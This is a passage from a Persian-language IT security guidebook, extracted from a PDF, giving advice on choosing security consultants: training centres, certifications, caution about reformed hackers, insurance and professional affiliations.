‫ﻣﺘﺤﺪﻩ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺗﻌـﺪﺍﺩ ﻣﺤـﺪﻭﺩﻱ ﻣﺆﺳـﺴﺔ‬
‫ﺁﻣﻮﺯﺷﻲ ﺭﺍ ﺑﻌﻨﻮﺍﻥ "ﻗﻄﺒﻬﺎﻱ ﺁﻣﻮﺯﺷﻲ" ﻣﻌﺮﻓﻲ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﻃﺒﻖ‬
‫ﺁﻥ ﻓﻬﺮﺳﺖ ﻃﺮﺣﻬﺎﻱ ﭘﻴـﺸﺮﻭﻱ ﻣﺆﺳـﺴﺔ ‪ infosec‬ﺩﺭ ﮊﻭﺋـﻦ‬
‫‪ ۲۰۰۲‬ﺩﺭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺟﺮﺝ ﻣﻴـﺴﻮﻥ‪ ،١٠٨‬ﺟﻴﻤـﺰ ﻣﺪﻳـﺴﻮﻥ‪،١٠٩‬‬
‫ﺍﻳﺎﻟﺖ ﺍﻳﺪﺍﻫﻮ‪ ،١١٠‬ﺍﻳﺎﻟـﺖ ﺁﻳـﻮﺍ‪ ،١١١‬ﺁﻣﻮﺯﺷـﮕﺎﻩ ﻛﺎﺭﺷﻨﺎﺳـﻲ ﺍﺭﺷـﺪ‬
‫‪ ۱۰۶‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﭘﻮﺭﺗﺎﻝ ﻭﺏ ‪ CISSP‬ﺩﺭ‪:‬‬
‫‪http://www.cissps.com/‬‬
‫‪ ۱۰۷‬ﮔﻮﺍﻫﻲﻫﺎﻱ ﺯﻳﺮ ﺩﺭ ﺁﺩﺭﺱ ‪ www.isaca.org‬ﺭﺍ ﻧﻴﺰ ﺑﺒﻴﻨﻴﺪ‪:‬‬
‫)‪CISA (Certified Information Security Auditor‬‬
‫‪CISM (Certified Information Security‬‬
‫)‪Manager‬‬
‫‪George Mason University‬‬
‫‪James Medison University‬‬
‫‪Idaho‬‬
‫‪Iowa‬‬
‫‪108‬‬
‫‪109‬‬
‫‪110‬‬
‫‪111‬‬
‫‪١٧١‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻧﻴﺮﻭﻱ ﺩﺭﻳﺎﻳﻲ‪ ،‬ﺩﺍﻧﺸﮕﺎﻩ ﭘﻮﺭﺩﻭ‪ ،١١٢‬ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﻟﻴﻔﺮﻧﻴـﺎ‬
‫ﺩﺭ ﺩﻳﻮﻳﺲ‪ ،١١٣‬ﻭ ﺩﺍﻧﺸﮕﺎﻩ ﺍﻳﺪﺍﻫﻮ ﺍﺭﺍﺋﻪ ﺷﺪﻧﺪ‪ .‬ﺩﺭ ﺍﻃﺮﺍﻑ ﺟﻬـﺎﻥ‬
‫ﻣﺮﺍﻛﺰ ﻣﻘﺪﻣﺎﺗﻲ ﻓﺮﺍﻭﺍﻧـﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﻧﺪ‪ .‬ﻣﻨﺎﺑﻊ ﻣﺤﻠﻲ ﺧﻮﺩ ﺍﺯ ﺟﻤﻠﻪ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗـﺎ‬
‫ﻣﺮﺍﻛﺰ ﻣﺸﺎﺑﻬﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻧﺠﺎ ﻣﺴﺘﻘﺮ ﺑﺎﺷﻨﺪ ﺭﺍ ﺑﻴﺎﺑﻴﺪ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻳﻜـﻲ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺩﺭ ﺑﺨـﺶ‬
‫ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻧﻤﺎﺋﻴﺪ‪.‬‬
‫ﺷﻬﺮﺕ‬
‫ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﻛﺎﺭ ﺑﺎ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺩﻋﺎ ﻣـﻲﻛﻨﻨـﺪ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺻﻼﺡ ﺷﺪﻩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻣﺸﺎﻭﺭﺍﻥ ﺍﻣﻨﻴﺖ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‬
‫ﺧﻮﺩﺩﺍﺭﻱ ﻛﻨﻴﺪ‪ ١١٤.‬ﺍﮔﺮﭼﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﺍﺭﺗﻜـﺎﺏ‬
‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭﮔﻴﺮ ﻫﺴﺘﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺒﺪﻳﻞ ﺑﻪ ﻋﻀﻮ ﻣﻔﻴﺪﻱ‬
‫ﺍﺯ ﺟﺎﻣﻌﻪ ﺷﻮﻧﺪ‪ ،‬ﺍﻣﺎ ﻧﺒﺎﻳﺪ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻪ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﺮﺗﻜﺐ ﺟﺮﺍﺋﻢ‬
‫ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﺳﻮﺀ ﺳﺎﺑﻘﻪ ﺩﺍﺭﻧﺪ ﺧﻮﺵ ﺑﻴﻦ ﺷﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﻜﺎﺕ‬
‫ﺯﻳﺮ ﻗﺎﺑﻞ ﺍﺷﺎﺭﻩﺍﻧﺪ‪:‬‬
‫‪.۱‬‬
‫ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﮔﺬﺷﺘﺔ ﺧﻮﺩ ﺳﺎﺑﻘﺔ ﺧﺪﺷﻪﺩﺍﺭ‬
‫ﻛﺮﺩﻥ ﻗﺎﻧﻮﻥ‪ ،‬ﻣﺎﻟﻜﻴـﺖ ﺷﺨـﺼﻲ‪ ،‬ﻭ ﺣﻘـﻮﻕ ﺧـﺼﻮﺻﻲ‬
‫ﺍﻓﺮﺍﺩ ﺭﺍ ﺩﺍﺭﻧﺪ ﺍﻧﺘﺨﺎﺏ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺭﺍﺋـﻲ ﻭ‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﺣﺮﺍﺳـﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺣﻴـﺎﺗﻲ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺁﻳﺎ ﺷﻤﺎ ﺣﺎﺿﺮﻳﺪ ﺍﺯ ﻳﻚ ﻣﺠـﺮﻡ ﺳـﺎﺑﻘﻪﺩﺍﺭ ﺑـﺮﺍﻱ‬
‫ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻢ ﻧﻈﺎﺭﺕ ﻭ ﻫﺸﺪﺍﺭ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺣﺎﺿﺮﻳﺪ ﻳﻚ ﺗﺒﻬﻜـﺎﺭ ﺍﺻـﻼﺡ ﺷـﺪﻩ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺍﺩﺍﺭﺓ ﻣﺮﻛﺰ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﻭﻳﮋﺓ ﺷﺮﻛﺖ ﺑﻜـﺎﺭ ﮔﻴﺮﻳـﺪ؟ ﺍﻳـﻦ‬
‫ﻣﻮﺍﺭﺩ ﺗﻨﻬـﺎ ﭘـﻴﺶﺑﻴﻨﻴﻬـﺎﻱ ﺑـﺪ ﻧﻴـﺴﺘﻨﺪ؛ ﺑﻠﻜـﻪ ﻫﺮﻳـﻚ‬
‫ﺩﺭﺻــﻮﺭﺕ ﺑــﺮﻭﺯ ﺍﺷــﻜﺎﻝ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﭘــﺎﻱ ﺷــﻤﺎ ﺭﺍ ﺑــﻪ‬
‫ﺩﺍﺩﮔﺎﻫﻬﺎ ﻭ ﻣﺤﺎﻛﻢ ﻣﺪﻧﻲ ﺑﺎﺯ ﻛﻨﻨﺪ ‪ -‬ﺑﻪ ﻫـﺮ ﺣـﺎﻝ ﺍﻳـﻦ‬
‫ﺷﻤﺎ ﺑﻮﺩﻩﺍﻳﺪ ﻛﻪ ﻋﻠﻴﺮﻏﻢ ﺁﮔﺎﻫﻲ ﺍﺯ ﺳﺎﺑﻘﺔ ﺁﻧـﺎﻥ ﺗـﺼﻤﻴﻢ‬
‫ﺑﻪ ﺍﺳﺘﺨﺪﺍﻣﺸﺎﻥ ﮔﺮﻓﺘﻪﺍﻳﺪ‪.‬‬
‫‪.۲‬‬
‫ﺑﻪ ﻫﻤﻴﻦ ﺻﻮﺭﺕ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻫﻨﮕﺎﻡ ﺍﻧﺠـﺎﻡ‬
‫ﻣﺼﺎﺣﺒﻪ ﺑﺎ ﺷﻤﺎ ﺍﺯ ﺍﺭﺍﺋﻪ ﺍﺳﻢ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺍﻣﺘﻨﺎﻉ ﻣﻲﻭﺭﺯﻧﺪ‬
‫ﻣﺮﺍﻗﺒﺖ ﺑﻪ ﺧﺮﺝ ﺩﻫﻴﺪ‪ .‬ﺷﺎﻳﺪ ﺁﻧﻬﺎ ﻭﺍﻗﻌﹰﺎ ﺩﺭ ﻭﺭﻭﺩ ﺑﻪ ﺑﺪﻧـﺔ‬
‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺗﻤـﺎﺱ ﺗﻠﻔﻨـﻲ ﺧﺒـﺮﻩ‬
‫ﺑﺎﺷﻨﺪ! ﺍﻣﺎ ﻳﻜﻲ ﺍﺯ ﺍﺑﺘﺪﺍﺋﻲﺗـﺮﻳﻦ ﺩﻻﻳﻠـﻲ ﻛـﻪ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺍﺯ ﺍﺳﺎﻣﻲ ﻣﺴﺘﻌﺎﺭ ﺑﺮﺷﻤﺮﺩ ﺍﻳﻦ ﺍﺳـﺖ‬
‫ﻛﻪ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ ﻗﺒﺎﻝ ﻛﺎﺭﻫﺎﻳﺸﺎﻥ ﻣﺴﺌﻮﻟﻴﺘﻲ ﺑﺮ ﻋﻬﺪﻩ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﻳـﻚ ﻧـﺎﻡ ﻣـﺴﺘﻌﺎﺭ ﺑـﺪﻧﺎﻡ ﺷـﺪ ﺑـﺴﻴﺎﺭ‬
‫ﺁﺳﺎﻧﺘﺮ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﻋﻮﺽ ﻛﺮﺩ ﺗﺎ ﺍﻳﻨﻜﻪ ﻛﺴﻲ ﺑﺨﻮﺍﻫـﺪ‬
‫ﻧﺎﻡ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺩ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ﻭ ﻳـﺎ ﺳـﺎﺑﻘﺔ ﺁﻧـﺮﺍ ﺍﺻـﻼﺡ‬
‫ﻛﻨﺪ‪.‬‬
‫ﺑﻴﻤﻪ ﻭ ﺗﻌﻬﺪﻧﺎﻣﻪ‬
‫ﺍﺯ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻛﺎﺭ ﻛﻨﻨﺪ ﺑﭙﺮﺳـﻴﺪ ﻛـﻪ ﺁﻳـﺎ‬
‫ﺑﻴﻤﻪ ﻫﺴﺘﻨﺪ ﻭ ﺗﻌﻬﺪ ﺳﭙﺮﺩﻩﺍﻧﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﺍﻳﻨﻜﺎﺭ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛـﻪ‬
‫ﺷﺮﻛﺖ ﺁﻧﻬﺎ ﺑﻪ ﺷﺎﻳﺴﺘﮕﻲ ﻭ ﺭﻓﺘﺎﺭ ﺍﻓﺮﺍﺩ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﺪ‪ .‬ﺍﻳﻨﻜـﺎﺭ‬
‫ﺗﻀﻤﻴﻦ ﻧﻤﻲﻛﻨـﺪ ﻛـﻪ ﺁﻥ ﺳـﺎﺯﻣﺎﻥ ﻭﺍﺟـﺪ ﺷﺎﻳـﺴﺘﮕﻴﻬﺎﻱ ﻻﺯﻡ‬
‫ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻧﻮﻋﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﺁﻥ ﺳـﻮﺀ‬
‫ﭘﻴﺸﻴﻨﺔ ﺟﻨﺎﻳﻲ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫ﺭﺍﺑﻄﻪﻫﺎ‬
‫ﺍﺯ ﺍﻓــﺮﺍﺩ ﺑﭙﺮﺳــﻴﺪ ﻛــﻪ ﺩﺭ ﻛــﺪﺍﻡ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺤﻠــﻲ‪ ،‬ﻣﻠــﻲ ﻭ‬
‫ﺑـــﻴﻦﺍﻟﻤﻠﻠـــﻲ )‪ ،IEEE ،CSI ،ASIS ،ACM‬ﻭ ‪ (UNISEX‬ﻋـــﻀﻮ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﺁﻳﺎ ﺍﺭﺗﺒﺎﻁ ﻣﻄﻠﻮﺑﻲ ﺑﺎ ﺁﻧﻬﺎ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﺍﻳﻦ ﺳـﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺑﺮﺍﻱ ﺍﻋﻀﺎﻱ ﺧـﻮﺩ ﻣﻄﺎﻟـﺐ ﺁﻣﻮﺯﺷـﻲ ﻭ ﻓﺮﺻـﺘﻬﺎﻱ ﭘﻴـﺸﺮﻓﺖ‬
‫ﺗﺨﺼﺼﻲ ﻣﻬﻴﺎ ﻣﻲﺳﺎﺯﻧﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺑـﺮﺍﻱ ﺭﻓﺘـﺎﺭ‬
‫ﺣﺮﻓﻪﺍﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﮔﺮ ﺳﻮﮊﺓ ﺷﻤﺎ ﺗﻨﻬﺎ ﻣـﺪﻋﻲ‬
‫ﺳﺎﺑﻘﺔ ﻋـﻀﻮﻳﺖ ﺩﺭ ﮔﺮﻭﻫﻬـﺎﻳﻲ ﻣﺜـﻞ " ‪The 133t Hax0r‬‬
‫‪ "Guild‬ﺍﺳﺖ ﺷﺎﻳﺪ ﺑﻬﺘـﺮ ﺑﺎﺷـﺪ ﺟـﺎﻱ ﺩﻳﮕـﺮﻱ ﺑـﺪﻧﺒﺎﻝ ﻳـﻚ‬
‫ﻛﺎﺭﺷﻨﺎﺱ ﺍﻣﻨﻴﺖ ﺑﮕﺮﺩﻳﺪ!‬
‫‪ ۱۱۴‬ﺁﻣﺎﺭﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻛﻪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺍﺻـﻼﺡ‪-‬‬
‫ﺷﺪﻩ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺑﻮﺩﻧﺪ ﺩﺭ "ﺗﺤﻘﻴﻖ ﺟﺮﻡ ﻭ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ" ﺳـﺎﻝ‬
‫‪ CSI/FBI ۲۰۰۳‬ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫‪112 Purdue University‬‬
‫‪113 The University of California at Davis‬‬
‫‪http://i.cmpnet.com/gocsi/db_area/pdfs/fbi/FBI‬‬
‫‪2003.pdf‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﭘﺮﻛﺎﺭﺑﺮﺩ ﻧﻮﺷـﺘﻪ ﺑﺎﺷـﺪ ﻳـﺎ ﺩﺭ ﻳـﻚ‬
‫ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺘﻲ ﻣﺜﻞ ﻭﻳﺮﻭﺱ ﻳﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺘﺎﺑﻲ ﺗـﺄﻟﻴﻒ ﻛـﺮﺩﻩ‬
‫ﺑﺎﺷﺪ ﺑﺪﺍﻥ ﻣﻌﻨﺎ ﻧﻴﺴﺖ ﻛﻪ ﺑﺎ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺁﺷﻨﺎﺳﺖ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﺯ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺳﺎﺑﻘﺔ ﺯﻳﺎﺩﻱ ﺩﺭ ﺩﺍﻣﻨﺔ ﻭﺳـﻴﻌﻲ ﺍﺯ ﻣـﺴﺎﺋﻞ‬
‫ﺍﻣﻨﻴﺘﻲ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺗﻨﻬﺎ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ‬
‫ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷـﻬﺮﺕ ﺯﻳـﺎﺩ ﻟﺰﻭﻣـﹰﺎ ﺑـﻪ ﻣﻌﻨـﺎﻱ‬
‫ﺷﺎﻳﺴﺘﮕﻲ ﺑﺮﺍﻱ ﻣﺸﺎﻭﺭﻩ ﻧﻤﻲﺑﺎﺷﺪ‪.‬‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺻﻼﺡ ﺷﺪﻩ‬
‫‪١٧٢‬‬
‫‪.۳‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﻣـﺮﻭﺯﻱ ﭼﻨـﺪﺍﻥ‬
‫ﻫﻢ ﺑﻪ ﻣﺒﺎﺣﺚ ﺍﻣﻨﻴﺘﻲ ﻭﺍﺭﺩ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺁﻧﻬﺎ ﻫـﻢ ﺩﺭ ﺭﻭﺵ ﻭ‬
‫ﻫﻢ ﺩﺭ ﺷﻴﻮﺓ ﻛﺎﺭ ﺑﻴﺸﺘﺮ ﻣﺎﻧﻨﺪ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺟﻨـﺎﻳﻲ ﻋﻤـﻞ‬
‫ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﺮﻧﺎﻣـﻪ ﻧﻮﻳـﺴﺎﻥ ﻭ ﻣﻌﻤـﺎﺭﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ‪ .‬ﺍﻳـﻦ‬
‫ﻛﻴﻔﻴﺖ ﭘﺎﺋﻴﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ ﺍﻣـﺮﻭﺯﻱ‪ ،‬ﻓﻘـﺪﺍﻥ ﺭﻭﻧـﺪ‬
‫ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻳﻬﺎ‪ ،‬ﻭ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﮔـﺴﺘﺮﺩﺓ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫ ﺧﻮﺩﻛﺎﺭ ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﺷﺪﻩ ﺩﺳﺖﻳـﺎﺯﻱ‬
‫ﻭ ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﺎﺩﮔﻲ ﻣﻴـﺴﺮ ﺑﺎﺷـﺪ‪.‬‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻳﻜﻨﻔﺮ ﺑﺎ ﺳﺎﺑﻘﺔ ﭘﺮﺵ ﺑﺎ ﺍﺗﻮﻣﺒﻴﻞ ﻟﺰﻭﻣﹰﺎ ﻳﻚ‬
‫ﺭﺍﻧﻨﺪﺓ ﻣﺎﻫﺮ ﻣﺎﺷﻴﻦ ﻣﺴﺎﺑﻘﻪ ﻳﺎ ﻳﻚ ﻃـﺮﺍﺡ ﺧﺒـﺮﺓ ﻣﻮﺗـﻮﺭ‬
‫ﺍﺗﻮﻣﺒﻴﻞ ﻧﻴﺴﺖ‪ ،‬ﻛﺴﻲ ﻛﻪ ﻣﻲ ﺩﺍﻧﺪ ﭼﮕﻮﻧـﻪ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎﻱ‬
‫ﻧﻔﻮﺫ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﻨﺪ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺭﺍ‬
‫ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﻓﻬﻢ ﺧﻮﺩ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻮﺭﺩ‬
‫ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺩﭼـﺎﺭ ﻣـﺸﻜﻼﺕ‬
‫ﺑﻨﻴﺎﺩﻳﻦ ﺑﺎﺷﺪ‪.‬‬
‫ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫‪.۲‬‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺯ ﻛﺴﻲ ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﺁﻥ‬
‫ﺟﺰﺀ ﺑﺮ ﻋﻬﺪﺓ ﺍﻭ ﺍﺳﺖ ﮔﺰﺍﺭﺵ ﻛﺘﺒﻲ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ‪ .‬ﺍﮔـﺮ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻧـﺼﺐ ﺷـﺪﻩ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺩﻧﻴﺎﻱ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺑﻔﺮﺳـﺘﺪ ﻳـﺎ‬
‫ﺩﺭ ﭘﺮﻛــﺎﺭﺑﺮﺩﺗﺮﻳﻦ ﺳــﺎﻋﺎﺕ ﺭﻭﺯ ﺑــﺼﻮﺭﺕ ﻏﻴﺮﻣﻨﺘﻈــﺮﻩ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ‪ ،‬ﻧﺒﺎﻳﺪ ﻧﺎﮔﻬﺎﻥ ﻣﺘﻮﺟـﻪ‬
‫ﺷﻮﻳﺪ ﻃﺒﻖ ﺗﻮﺍﻓﻘﻲ ﻛـﻪ ﺑـﺎ ﻓﺮﻭﺷـﻨﺪﻩ ﺩﺍﺷـﺘﻪﺍﻳـﺪ ﻫـﻴﭻ‬
‫ﻣﺴﺌﻮﻟﻴﺘﻲ ﻣﺘﻮﺟﻪ ﺍﻭ ﻧﻴﺴﺖ!‬
‫‪.۳‬‬
‫ﺧﺎﻃﺮﺟﻤﻊ ﺷﻮﻳﺪ ﻛﻪ ﺩﺭ ﺗﻮﺳﻌﻪ‪ ،‬ﺁﺯﻣـﺎﻳﺶ ﻭ ﺍﺳـﺘﻘﺮﺍﺭ ﺁﻥ‬
‫ﻓﻨﺎﻭﺭﻱ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺍﻓﺰﻭﺩﻩ ﻣﻲﺷﻮﺩ ﻣﺮﺍﻗﺒﺖ‬
‫ﺩﻗﻴﻖ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ؛ ﺑﻮﻳﮋﻩ ﺍﮔﺮ ﻃﺮﺍﺣﻲ ﻣﻨﺤـﺼﺮ ﺑـﻪ‬
‫ﻓﺮﺩﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﻄﻮﺭ ﺧـﺎﺹ‪ ،‬ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﺳـﻮﺍﺑﻖ‬
‫ﻛﻴﻔــﻲ ﻭ ﻣــﺴﺎﺋﻞ ﺍﻣﻨﻴﺘــﻲ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺷــﺮﻛﺖ‬
‫ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ‪ ،‬ﭘﻴــﺸﻨﻬﺎﺩ ﻣــﻲﻛﻨــﻴﻢ ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺧﺪﻣﺎﺕ ﻫﺮ ﺷﺮﻛﺘﻲ ﻛﻪ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪ ﻓﻨـﺎﻭﺭﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺮ ﻣﺒﻨﺎﻱ ﻣﺤﺼﻮﻻﺕ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻗـﺮﺍﺭ ﺩﻫـﺪ‬
‫ﺩﻗــﺖ ﻻﺯﻡ ﺭﺍ ﺑﻌﻤــﻞ ﺁﻭﺭﻳــﺪ؛ ﭼﺮﺍﻛــﻪ ﺁﻥ ﺷــﺮﻛﺖ ﺑﺎﻳــﺪ‬
‫ﻫﻤﻮﺍﺭﻩ ﻣﻌﺎﻳﺐ ﻳﺎﻓﺖﺷﺪﺓ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﺤﺼﻮﻻﺕ‬
